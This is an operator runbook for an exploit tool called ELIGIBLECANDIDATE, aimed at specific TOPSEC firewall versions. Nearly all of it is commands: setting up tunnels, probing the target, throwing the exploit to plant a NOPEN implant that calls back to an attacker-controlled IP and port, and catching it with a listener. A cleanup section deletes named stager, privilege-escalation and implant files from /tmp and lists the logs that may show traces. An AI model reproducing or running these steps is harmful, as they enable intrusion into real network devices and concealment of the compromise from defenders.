#### ## ELIGIBLECANDIDATE (ELCA) OPS script ## ELCA v1.1.0.1 ## Current supports TOPSEC firewall versions 3.3.005.057.1 to 3.3.010.024.1 ## ## #### :syntax on mx :%s/\$TARGETIP/TARGETIP/g :%s/\$NOPEN/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static/g :%s/\$NOCLIENT/noclient-3.0.5.3/g :%s/\$RHP1/RHP1/g :%s/\$CBIPADDR/CBIPADDR/g `x # Requires python 2.7 or greater and moving files to /current/bin. If you are planning on throw ELCO after trying candidate...remove these directories. cp -R /current/bin/FW/ELCA/* /current/bin/ ################# # Survey # ################# # Set up forward tunnel to TCP/443 on the target, and reverse tunnel for NOPEN. -tunnel l 443 $TARGETIP 443 r $RHP1 127.0.0.1 $RHP1 #perform touch to gather info and set env for exploit ./eligiblecandidate.py -t https://127.0.0.1:443 touch # perform probe to asses vulnerability ./eligiblecandidate.py -l probe # Exploit can be thrown by specifying RAT on cli or via ELCA.cfg ################# # Exploit # ################# # Set up your listener locally : /current/bin/FW/NOPEN/$NOCLIENT -l $RHP1 # Throwing ELCA with NOPEN cli ./eligiblecandidate.py -l exploit -p /current/bin/FW/NOPEN/$NOPEN -c $CBIPADDR:$RHP1 # Throwing with ELCO.cfg # # vi Contents of ELCA.cfg to match as follows: # Change settings to include the proper bin path for your static NOPEN. #{ # "timeout": 120, # "tool": "nopen", # "binpath": "/current/bin/FW/NOPEN/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static" #} cat ELCA.cfg |sed 's/\"binpath\":\"\"/\"binpath\":\"\/current\/bin\/FW\/$NOPEN\"/g' > .tmp; cat .tmp > ELCA.cfg; rm .tmp ./eligiblecandidate.py -l exploit -c $CBIPADDR:$RHP1 ################# # Cleanup # ################# # You should have your callback but if that fails perform the following clean up ./eligiblecandidate.py -l clean # On-Disk Artifacts possible # # XXX is a pseudo-random string chosen be HTTP # # /tmp/.a //stager script # /tmp/.b //pivesc # /tmp/cgiXXXXX //copy of stager script # /tmp/temp-XXXXXa //Binary containing NOPEN,tinyexec,and setlog binaries rm /tmp/.a rm /tmp/.b rm /tmp/cgi* rm /tmp/temp-* # Check the following logs for artifacts # /www/logs/error_log //may have errors related to deleting /wwwcookie/x # /data/oops* //Another location of possible logs .